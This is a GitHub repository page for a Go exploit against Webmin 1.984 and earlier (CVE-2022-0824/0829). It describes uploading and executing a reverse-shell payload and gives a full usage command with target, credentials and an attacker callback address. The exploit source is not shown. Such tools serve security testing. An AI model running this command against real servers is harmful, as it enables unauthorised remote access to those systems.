golang-webmin-CVE-2022-0824-revshell

RCE in Webmin <= 1.984

CVE-2022-0824 and CVE-2022-0829

This exploits a BAC vuln in Webmin to upload a malicious file, change the permissions on the file, and execute the file. The file, created in the makePayload function, is a reverse shell back to an attacker controlled server.

Usage

go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444

t -> target url
c -> creds for webmin
sl -> your local server IP and port to host your payload
s -> callback ip
p -> callback port

References

https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824

Name		Name	Last commit message	Last commit date
Latest commit History 9 Commits
README.md		README.md
cve-2022-0824.go		cve-2022-0824.go

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

golang-webmin-CVE-2022-0824-revshell

Usage

References

About

Releases

Packages

Languages

pizza-power/golang-webmin-CVE-2022-0824-revshell

Folders and files

Latest commit

History

Repository files navigation

golang-webmin-CVE-2022-0824-revshell

Usage

References

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages